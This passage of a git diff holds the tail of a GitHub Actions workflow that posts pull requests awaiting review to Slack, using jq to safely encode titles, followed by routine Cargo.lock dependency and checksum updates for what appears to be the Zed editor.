"repos/${REPO}/pulls?state=open&sort=updated&direction=asc&per_page=100" \ + --jq "[ + .[] | + select(.draft == false) | + select(.created_at > \"$PROCESS_START_DATE\") | + select(.created_at < \"$CUTOFF\") | + select((.requested_reviewers | length > 0) or (.requested_teams | length > 0)) + ]" > /tmp/candidates.json + + # Filter to PRs with zero approving reviews + jq -r '.[].number' /tmp/candidates.json | while read -r PR_NUMBER; do + APPROVALS=$(gh api \ + "repos/${REPO}/pulls/${PR_NUMBER}/reviews" \ + --jq "[.[] | select(.state == \"APPROVED\")] | length" 2>/dev/null || echo "0") + + if [ "$APPROVALS" -eq 0 ]; then + jq ".[] | select(.number == ${PR_NUMBER}) | {number, title, author: .user.login, created_at}" \ + /tmp/candidates.json + fi + done | jq -s '.' > /tmp/awaiting.json + + COUNT=$(jq 'length' /tmp/awaiting.json) + echo "count=$COUNT" >> "$GITHUB_OUTPUT" + + - name: Notify Slack + if: steps.stale.outputs.count != '0' + env: + SLACK_WEBHOOK_PR_REVIEW_BOT: ${{ secrets.SLACK_WEBHOOK_PR_REVIEW_BOT }} + COUNT: ${{ steps.stale.outputs.count }} + run: | + # Build Block Kit payload from JSON — no shell interpolation of PR titles. + # Why jq? PR titles are attacker-controllable input. By reading them + # through jq -r from the JSON file and passing the result to jq --arg, + # the content stays safely JSON-encoded in the final payload. + PRS=$(jq -r '.[] | "• — \(.title) (by \(.author), opened \(.created_at | split("T")[0]))"' /tmp/awaiting.json) + + jq -n \ + --arg count "$COUNT" \ + --arg prs "$PRS" \ + '{ + text: ($count + " PR(s) awaiting review for >72 hours"), + blocks: [ + { + type: "section", + text: { + type: "mrkdwn", + text: (":hourglass_flowing_sand: *" + $count + " PR(s) Awaiting Review >72 Hours*") + } + }, + { + type: "section", + text: { type: "mrkdwn", text: $prs } + }, + { type: "divider" }, + { + type: "context", + elements: [{ + type: "mrkdwn", + text: "PRs awaiting review are surfaced daily. Reviewers: pick one up or reassign." + }] + } + ] + }' | \ + curl -s -X POST "$SLACK_WEBHOOK_PR_REVIEW_BOT" \ + -H 'Content-Type: application/json' \ + -d @- +defaults: + run: + shell: bash -euxo pipefail {0} diff --git a/Cargo.lock b/Cargo.lock index 30cca7cafd7d62623b2c52c6e013616a6db1b90c..46d4732898427f1d1f2e733e24a61f15f0714d03 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -228,9 +228,9 @@ dependencies = [ [[package]] name = "agent-client-protocol" -version = "0.9.4" +version = "0.10.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2659b1089101b15db31137710159421cb44785ecdb5ba784be3b4a6f8cb8a475" +checksum = "9c56a59cf6315e99f874d2c1f96c69d2da5ffe0087d211297fc4a41f849770a2" dependencies = [ "agent-client-protocol-schema", "anyhow", @@ -245,16 +245,16 @@ dependencies = [ [[package]] name = "agent-client-protocol-schema" -version = "0.10.8" +version = "0.11.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "44bc1fef9c32f03bce2ab44af35b6f483bfd169bf55cc59beeb2e3b1a00ae4d1" +checksum = "e0497b9a95a404e35799904835c57c6f8c69b9d08ccfd3cb5b7d746425cd6789" dependencies = [ "anyhow", "derive_more", "schemars", "serde", "serde_json", - "strum 0.27.2", + "strum 0.28.0", ] [[package]] @@ -272,6 +272,7 @@ dependencies = [ "collections", "credentials_provider", "env_logger 0.11.8", + "feature_flags", "fs", "futures 0.3.31", "google_ai", @@ -334,7 +335,6 @@ dependencies = [ "agent_settings", "ai_onboarding", "anyhow", - "arrayvec", "assistant_slash_command", "assistant_slash_commands", "assistant_text_thread", @@ -363,6 +363,7 @@ dependencies = [ "git", "gpui", "gpui_tokio", + "heapless", "html_to_markdown", "http_client", "image", @@ -662,7 +663,6 @@ dependencies = [ "schemars", "serde", "serde_json", - "settings", "strum 0.27.2", "thiserror 2.0.17", ] @@ -734,9 +734,6 @@ name = "arrayvec" version = "0.7.6" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "7c02d123df017efcdfbd739ef81735b36c5ba83ec3c59c80a9d7ecc718f92e50" -dependencies = [ - "serde", -] [[package]] name = "as-raw-xcb-connection" @@ -1282,7 +1279,6 @@ name = "audio" version = "0.1.0" dependencies = [ "anyhow", - "async-tar", "collections", "cpal", "crossbeam", @@ -1294,7 +1290,6 @@ dependencies = [ "rodio", "serde", "settings", - "smol", "thiserror 2.0.17", "util", ] @@ -2074,7 +2069,16 @@ version = "0.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "08807e080ed7f9d5433fa9b275196cfc35414f66a0c79d864dc51a0d825231a3" dependencies = [ - "bit-vec", + "bit-vec 0.8.0", +] + +[[package]] +name = "bit-set" +version = "0.9.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "34ddef2995421ab6a5c779542c81ee77c115206f4ad9d5a8e05f4ff49716a3dd" +dependencies = [ + "bit-vec 0.9.1", ] [[package]] @@ -2083,6 +2087,12 @@ version = "0.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "5e764a1d40d510daf35e07be9eb06e75770908c27d411ee6c92109c9840eaaf7" +[[package]] +name = "bit-vec" +version = "0.9.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b71798fca2c1fe1086445a7258a4bc81e6e49dcd24c8d0dd9a1e57395b603f51" + [[package]] name = "bit_field" version = "0.10.3" @@ -2194,7 +2204,7 @@ version = "3.8.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "89ec27229c38ed0eb3c0feee3d2c1d6a4379ae44f418a29a658890e062d8f365" dependencies = [ - "darling", + "darling 0.21.3", "ident_case", "prettyplease", "proc-macro2", @@ -2460,7 +2470,7 @@ version = "0.25.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "9225bdcf4e4a9a4c08bf16607908eb2fbf746828d5e0b5e019726dbf6571f201" dependencies = [ - "darling", + "darling 0.20.11", "proc-macro2", "quote", "syn 2.0.117", @@ -3164,17 +3174,6 @@ dependencies = [ "objc", ] -[[package]] -name = "codespan-reporting" -version = "0.12.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "fe6d2e5af09e8c8ad56c969f2157a3d4238cebc7c55f0a517728c38f7b200f81" -dependencies = [ - "serde", - "termcolor", - "unicode-width", -] - [[package]] name = "codespan-reporting" version = "0.13.0" @@ -3320,6 +3319,7 @@ dependencies = [ "futures 0.3.31", "fuzzy", "gpui", + "livekit_client", "log", "menu", "notifications", @@ -3339,6 +3339,7 @@ dependencies = [ "ui", "util", "workspace", + "zed_actions", ] [[package]] @@ -3570,6 +3571,7 @@ version = "0.1.0" dependencies = [ "anyhow", "async-trait", + "base64 0.22.1", "collections", "futures 0.3.31", "gpui", @@ -3578,14 +3580,17 @@ dependencies = [ "net", "parking_lot", "postage", + "rand 0.9.2", "schemars", "serde", "serde_json", "settings", + "sha2", "slotmap", "smol", "tempfile", "terminal", + "tiny_http", "url", "util", ] @@ -4397,7 +4402,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "d74b6bcf49ebbd91f1b1875b706ea46545032a14003b5557b7dfa4bbeba6766e" dependencies = [ "cc", - "codespan-reporting 0.13.0", + "codespan-reporting", "indexmap", "proc-macro2", "quote", @@ -4412,7 +4417,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "94ca2ad69673c4b35585edfa379617ac364bccd0ba0adf319811ba3a74ffa48a" dependencies = [ "clap", - "codespan-reporting 0.13.0", + "codespan-reporting", "indexmap", "proc-macro2", "quote", @@ -4514,8 +4519,18 @@ version = "0.20.11" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "fc7f46116c46ff9ab3eb1597a45688b6715c6e628b5c133e288e709a29bcb4ee" dependencies = [ - "darling_core", - "darling_macro", + "darling_core 0.20.11", + "darling_macro 0.20.11", +] + +[[package]] +name = "darling" +version = "0.21.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9cdf337090841a411e2a7f3deb9187445851f91b309c0c0a29e05f74a00a48c0" +dependencies = [ + "darling_core 0.21.3", + "darling_macro 0.21.3", ] [[package]] @@ -4532,13 +4547,38 @@ dependencies = [ "syn 2.0.117", ] +[[package]] +name = "darling_core" +version = "0.21.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1247195ecd7e3c85f83c8d2a366e4210d588e802133e1e355180a9870b517ea4" +dependencies = [ + "fnv", + "ident_case", + "proc-macro2", + "quote", + "strsim", + "syn 2.0.117", +] + [[package]] name = "darling_macro" version = "0.20.11" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "fc34b93ccb385b40dc71c6fceac4b2ad23662c7eeb248cf10d529b7e055b6ead" dependencies = [ - "darling_core", + "darling_core 0.20.11", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "darling_macro" +version = "0.21.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d38308df82d1080de0afee5d069fa14b0326a88c14f15c5ccda35b4a6c414c81" +dependencies = [ + "darling_core 0.21.3", "quote", "syn 2.0.117", ] @@ -4582,6 +4622,7 @@ dependencies = [ "anyhow", "gpui", "indoc", + "inventory", "log", "paths", "release_channel", @@ -4590,6 +4631,7 @@ dependencies = [ "sqlez_macros", "tempfile", "util", + "uuid", "zed_env_vars", ] @@ -4809,11 +4851,11 @@ dependencies = [ [[package]] name = "derive_setters" -version = "0.1.8" +version = "0.1.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ae5c625eda104c228c06ecaf988d1c60e542176bd7a490e60eeda3493244c0c9" +checksum = "b7e6f6fa1f03c14ae082120b84b3c7fbd7b8588d924cf2d7c3daf9afd49df8b9" dependencies = [ - "darling", + "darling 0.21.3", "proc-macro2", "quote", "syn 2.0.117", @@ -5196,7 +5238,6 @@ version = "0.1.0" dependencies = [ "ai_onboarding", "anyhow", - "arrayvec", "brotli", "buffer_diff", "client", @@ -5214,6 +5255,7 @@ dependencies = [ "fs", "futures 0.3.31", "gpui", + "heapless", "indoc", "itertools 0.14.0", "language", @@ -5263,6 +5305,7 @@ dependencies = [ "client", "cloud_llm_client", "collections", + "db", "debug_adapter_extension", "dirs 4.0.0", "edit_prediction", @@ -6143,7 +6186,18 @@ version = "0.16.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "998b056554fbe42e03ae0e152895cd1a7e1002aec800fdc6635d20270260c46f" dependencies = [ - "bit-set", + "bit-set 0.8.0", + "regex-automata", + "regex-syntax", +] + +[[package]] +name = "fancy-regex" +version = "0.17.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "72cf461f865c862bb7dc573f643dd6a2b6842f7c30b07882b56bd148cc2761b8" +dependencies = [ + "bit-set 0.8.0", "regex-automata", "regex-syntax", ] @@ -6213,7 +6267,6 @@ dependencies = [ name = "feature_flags" version = "0.1.0" dependencies = [ - "futures 0.3.31", "gpui", ] @@ -6244,6 +6297,8 @@ name = "file_finder" version = "0.1.0" dependencies = [ "anyhow", + "channel", + "client", "collections", "ctor", "editor", @@ -6257,10 +6312,10 @@ dependencies = [ "pretty_assertions", "project", "project_panel", + "remote_connection", "serde", "serde_json", "settings", - "text", "theme", "ui", "util", @@ -6547,6 +6602,7 @@ dependencies = [ "async-trait", "cocoa 0.26.0", "collections", + "dunce", "fs", "futures 0.3.31", "git", @@ -7142,7 +7198,7 @@ dependencies = [ [[package]] name = "gh-workflow" version = "0.8.0" -source = "git+https://github.com/zed-industries/gh-workflow?rev=c9eac0ed361583e1072860d96776fa52775b82ac#c9eac0ed361583e1072860d96776fa52775b82ac" +source = "git+https://github.com/zed-industries/gh-workflow?rev=37f3c0575d379c218a9c455ee67585184e40d43f#37f3c0575d379c218a9c455ee67585184e40d43f" dependencies = [ "async-trait", "derive_more", @@ -7153,13 +7209,13 @@ dependencies = [ "serde", "serde_json", "serde_yaml", - "strum_macros", + "strum_macros 0.27.2", ] [[package]] name = "gh-workflow-macros" version = "0.8.0" -source = "git+https://github.com/zed-industries/gh-workflow?rev=c9eac0ed361583e1072860d96776fa52775b82ac#c9eac0ed361583e1072860d96776fa52775b82ac" +source = "git+https://github.com/zed-industries/gh-workflow?rev=37f3c0575d379c218a9c455ee67585184e40d43f#37f3c0575d379c218a9c455ee67585184e40d43f" dependencies = [ "heck 0.5.0", "quote", @@ -7319,6 +7375,7 @@ dependencies = [ "db", "editor", "feature_flags", + "file_icons", "futures 0.3.31", "fuzzy", "git", @@ -7455,9 +7512,9 @@ dependencies = [ [[package]] name = "glow" -version = "0.16.0" +version = "0.17.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c5e5ea60d70410161c8bf5da3fdfeaa1c72ed2c15f8bbb9d19fe3a4fad085f08" +checksum = "29038e1c483364cc6bb3cf78feee1816002e127c331a1eec55a4d202b9e1adb5" dependencies = [ "js-sys", "slotmap", @@ -7483,6 +7540,7 @@ dependencies = [ "indoc", "language", "menu", + "multi_buffer", "project", "rope", "serde", @@ -7609,7 +7667,7 @@ dependencies = [ "mach2 0.5.0", "media", "metal", - "naga 28.0.0", + "naga 29.0.0 (registry+https://github.com/rust-lang/crates.io-index)", "num_cpus", "objc", "objc2", @@ -7969,6 +8027,15 @@ dependencies = [ "smallvec", ] +[[package]] +name = "hash32" +version = "0.3.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "47d60b12902ba28e2730cd37e95b8c9223af2808df9e902d4df49588d1470606" +dependencies = [ + "byteorder", +] + [[package]] name = "hashbrown" version = "0.12.3" @@ -8053,6 +8120,16 @@ dependencies = [ "http 0.2.12", ] +[[package]] +name = "heapless" +version = "0.9.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2af2455f757db2b292a9b1768c4b70186d443bcb3b316252d6b540aec1cd89ed" +dependencies = [ + "hash32", + "stable_deref_trait", +] + [[package]] name = "heck" version = "0.3.3" @@ -9114,7 +9191,7 @@ dependencies = [ "bytecount", "data-encoding", "email_address", - "fancy-regex", + "fancy-regex 0.16.2", "fraction", "getrandom 0.3.4", "idna", @@ -9408,7 +9485,6 @@ dependencies = [ "aws_http_client", "base64 0.22.1", "bedrock", - "chrono", "client", "cloud_api_types", "cloud_llm_client", @@ -9437,6 +9513,7 @@ dependencies = [ "ollama", "open_ai", "open_router", + "opencode", "partial-json-fixer", "pretty_assertions", "release_channel", @@ -9722,7 +9799,7 @@ dependencies = [ [[package]] name = "libwebrtc" version = "0.3.26" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=37835f840d0070d45ac8b31cce6a6ae7aca3f459#37835f840d0070d45ac8b31cce6a6ae7aca3f459" +source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=c1209aa155cbf4543383774f884a46ae7e53ee2e#c1209aa155cbf4543383774f884a46ae7e53ee2e" dependencies = [ "cxx", "glib", @@ -9820,7 +9897,7 @@ checksum = "11d3d7f243d5c5a8b9bb5d6dd2b1602c0cb0b9db1621bafc7ed66e35ff9fe092" [[package]] name = "livekit" version = "0.7.32" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=37835f840d0070d45ac8b31cce6a6ae7aca3f459#37835f840d0070d45ac8b31cce6a6ae7aca3f459" +source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=c1209aa155cbf4543383774f884a46ae7e53ee2e#c1209aa155cbf4543383774f884a46ae7e53ee2e" dependencies = [ "base64 0.22.1", "bmrng", @@ -9846,7 +9923,7 @@ dependencies = [ [[package]] name = "livekit-api" version = "0.4.14" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=37835f840d0070d45ac8b31cce6a6ae7aca3f459#37835f840d0070d45ac8b31cce6a6ae7aca3f459" +source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=c1209aa155cbf4543383774f884a46ae7e53ee2e#c1209aa155cbf4543383774f884a46ae7e53ee2e" dependencies = [ "base64 0.21.7", "futures-util", @@ -9873,7 +9950,7 @@ dependencies = [ [[package]] name = "livekit-protocol" version = "0.7.1" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=37835f840d0070d45ac8b31cce6a6ae7aca3f459#37835f840d0070d45ac8b31cce6a6ae7aca3f459" +source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=c1209aa155cbf4543383774f884a46ae7e53ee2e#c1209aa155cbf4543383774f884a46ae7e53ee2e" dependencies = [ "futures-util", "livekit-runtime", @@ -9889,7 +9966,7 @@ dependencies = [ [[package]] name = "livekit-runtime" version = "0.4.0" -source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=37835f840d0070d45ac8b31cce6a6ae7aca3f459#37835f840d0070d45ac8b31cce6a6ae7aca3f459" +source = "git+https://github.com/zed-industries/livekit-rust-sdks?rev=c1209aa155cbf4543383774f884a46ae7e53ee2e#c1209aa155cbf4543383774f884a46ae7e53ee2e" dependencies = [ "tokio", "tokio-stream", @@ -9944,8 +10021,10 @@ dependencies = [ "settings", "simplelog", "smallvec", + "tokio", "ui", "util", + "webrtc-sys", "zed-scap", ] @@ -10199,7 +10278,6 @@ dependencies = [ "async-recursion", "collections", "editor", - "fs", "gpui", "html5ever 0.27.0", "language", @@ -10211,6 +10289,7 @@ dependencies = [ "pretty_assertions", "pulldown-cmark 0.13.0", "settings", + "stacksafe", "theme", "ui", "urlencoding", @@ -10710,16 +10789,16 @@ checksum = "e5ce46fe64a9d73be07dcbe690a38ce1b293be448fd8ce1e6c1b8062c9f72c6a" [[package]] name = "naga" -version = "28.0.0" +version = "29.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "618f667225063219ddfc61251087db8a9aec3c3f0950c916b614e403486f1135" +checksum = "85b4372fed0bd362d646d01b6926df0e837859ccc522fed720c395e0460f29c8" dependencies = [ "arrayvec", - "bit-set", + "bit-set 0.9.1", "bitflags 2.10.0", "cfg-if", "cfg_aliases 0.2.1", - "codespan-reporting 0.12.0", + "codespan-reporting", "half", "hashbrown 0.16.1", "hexf-parse", @@ -10735,15 +10814,15 @@ dependencies = [ [[package]] name = "naga" -version = "28.0.1" -source = "git+https://github.com/zed-industries/wgpu?rev=465557eccfe77c840a9b4936f1408da9503372c4#465557eccfe77c840a9b4936f1408da9503372c4" +version = "29.0.0" +source = "git+https://github.com/zed-industries/wgpu.git?branch=v29#a466bc382ea747f8e1ac810efdb6dcd49a514575" dependencies = [ "arrayvec", - "bit-set", + "bit-set 0.9.1", "bitflags 2.10.0", "cfg-if", "cfg_aliases 0.2.1", - "codespan-reporting 0.12.0", + "codespan-reporting", "half", "hashbrown 0.16.1", "hexf-parse", @@ -11273,9 +11352,9 @@ dependencies = [ [[package]] name = "objc2-audio-toolbox" -version = "0.3.1" +version = "0.3.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "10cbe18d879e20a4aea544f8befe38bcf52255eb63d3f23eca2842f3319e4c07" +checksum = "6948501a91121d6399b79abaa33a8aa4ea7857fe019f341b8c23ad6e81b79b08" dependencies = [ "bitflags 2.10.0", "libc", @@ -11288,9 +11367,9 @@ dependencies = [ [[package]] name = "objc2-avf-audio" -version = "0.3.1" +version = "0.3.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bfc1d11521c211a7ebe17739fc806719da41f56c6b3f949d9861b459188ce910" +checksum = "13a380031deed8e99db00065c45937da434ca987c034e13b87e4441f9e4090be" dependencies = [ "objc2", "objc2-foundation", @@ -11298,9 +11377,9 @@ dependencies = [ [[package]] name = "objc2-core-audio" -version = "0.3.1" +version = "0.3.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ca44961e888e19313b808f23497073e3f6b3c22bb485056674c8b49f3b025c82" +checksum = "e1eebcea8b0dbff5f7c8504f3107c68fc061a3eb44932051c8cf8a68d969c3b2" dependencies = [ "dispatch2", "objc2", @@ -11340,9 +11419,9 @@ checksum = "ef25abbcd74fb2609453eb695bd2f860d389e457f67dc17cafc8b8cbc89d0c33" [[package]] name = "objc2-foundation" -version = "0.3.1" +version = "0.3.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "900831247d2fe1a09a683278e5384cfb8c80c79fe6b166f9d14bfdde0ea1b03c" +checksum = "e3e0adef53c21f888deb4fa59fc59f7eb17404926ee8a6f59f5df0fd7f9f3272" dependencies = [ "bitflags 2.10.0", "block2", @@ -11363,9 +11442,9 @@ dependencies = [ [[package]] name = "objc2-metal" -version = "0.3.1" +version = "0.3.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7f246c183239540aab1782457b35ab2040d4259175bd1d0c58e46ada7b47a874" +checksum = "a0125f776a10d00af4152d74616409f0d4a2053a6f57fa5b7d6aa2854ac04794" dependencies = [ "bitflags 2.10.0", "block2", @@ -11375,6 +11454,19 @@ dependencies = [ "objc2-foundation", ] +[[package]] +name = "objc2-quartz-core" +version = "0.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "96c1358452b371bf9f104e21ec536d37a650eb10f7ee379fff67d2e08d537f1f" +dependencies = [ + "bitflags 2.10.0", + "objc2", + "objc2-core-foundation", + "objc2-foundation", + "objc2-metal", +] + [[package]] name = "objc_exception" version = "0.1.2" @@ -11573,6 +11665,20 @@ dependencies = [ "thiserror 2.0.17", ] +[[package]] +name = "opencode" +version = "0.1.0" +dependencies = [ + "anyhow", + "futures 0.3.31", + "google_ai", + "http_client", + "schemars", + "serde", + "serde_json", + "strum 0.27.2", +] + [[package]] name = "opener" version = "0.7.2" @@ -12082,7 +12188,7 @@ dependencies = [ [[package]] name = "pet" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "clap", "env_logger 0.10.2", @@ -12113,14 +12219,18 @@ dependencies = [ "pet-virtualenvwrapper", "pet-windows-registry", "pet-windows-store", + "pet-winpython", "serde", "serde_json", + "tracing", + "tracing-subscriber", + "winresource", ] [[package]] name = "pet-conda" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "env_logger 0.10.2", "lazy_static", @@ -12130,6 +12240,7 @@ dependencies = [ "pet-fs", "pet-python-utils", "pet-reporter", + "rayon", "regex", "serde", "serde_json", @@ -12139,7 +12250,7 @@ dependencies = [ [[package]] name = "pet-core" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "clap", "lazy_static", @@ -12154,7 +12265,7 @@ dependencies = [ [[package]] name = "pet-env-var-path" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "lazy_static", "log", @@ -12170,8 +12281,9 @@ dependencies = [ [[package]] name = "pet-fs" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ + "glob", "log", "msvc_spectre_libs", "windows-sys 0.59.0", @@ -12180,7 +12292,7 @@ dependencies = [ [[package]] name = "pet-global-virtualenvs" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12193,7 +12305,7 @@ dependencies = [ [[package]] name = "pet-homebrew" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "lazy_static", "log", @@ -12203,6 +12315,7 @@ dependencies = [ "pet-fs", "pet-python-utils", "pet-virtualenv", + "rayon", "regex", "serde", "serde_json", @@ -12211,7 +12324,7 @@ dependencies = [ [[package]] name = "pet-jsonrpc" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "env_logger 0.10.2", "log", @@ -12224,7 +12337,7 @@ dependencies = [ [[package]] name = "pet-linux-global-python" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12237,7 +12350,7 @@ dependencies = [ [[package]] name = "pet-mac-commandlinetools" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12250,7 +12363,7 @@ dependencies = [ [[package]] name = "pet-mac-python-org" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12263,7 +12376,7 @@ dependencies = [ [[package]] name = "pet-mac-xcode" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12276,20 +12389,22 @@ dependencies = [ [[package]] name = "pet-pipenv" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ + "lazy_static", "log", "msvc_spectre_libs", "pet-core", "pet-fs", "pet-python-utils", "pet-virtualenv", + "regex", ] [[package]] name = "pet-pixi" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "log", "msvc_spectre_libs", @@ -12301,7 +12416,7 @@ dependencies = [ [[package]] name = "pet-poetry" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "base64 0.22.1", "lazy_static", @@ -12322,7 +12437,7 @@ dependencies = [ [[package]] name = "pet-pyenv" version = "0.1.0" -source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" +source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056" dependencies = [ "lazy_static", "log", 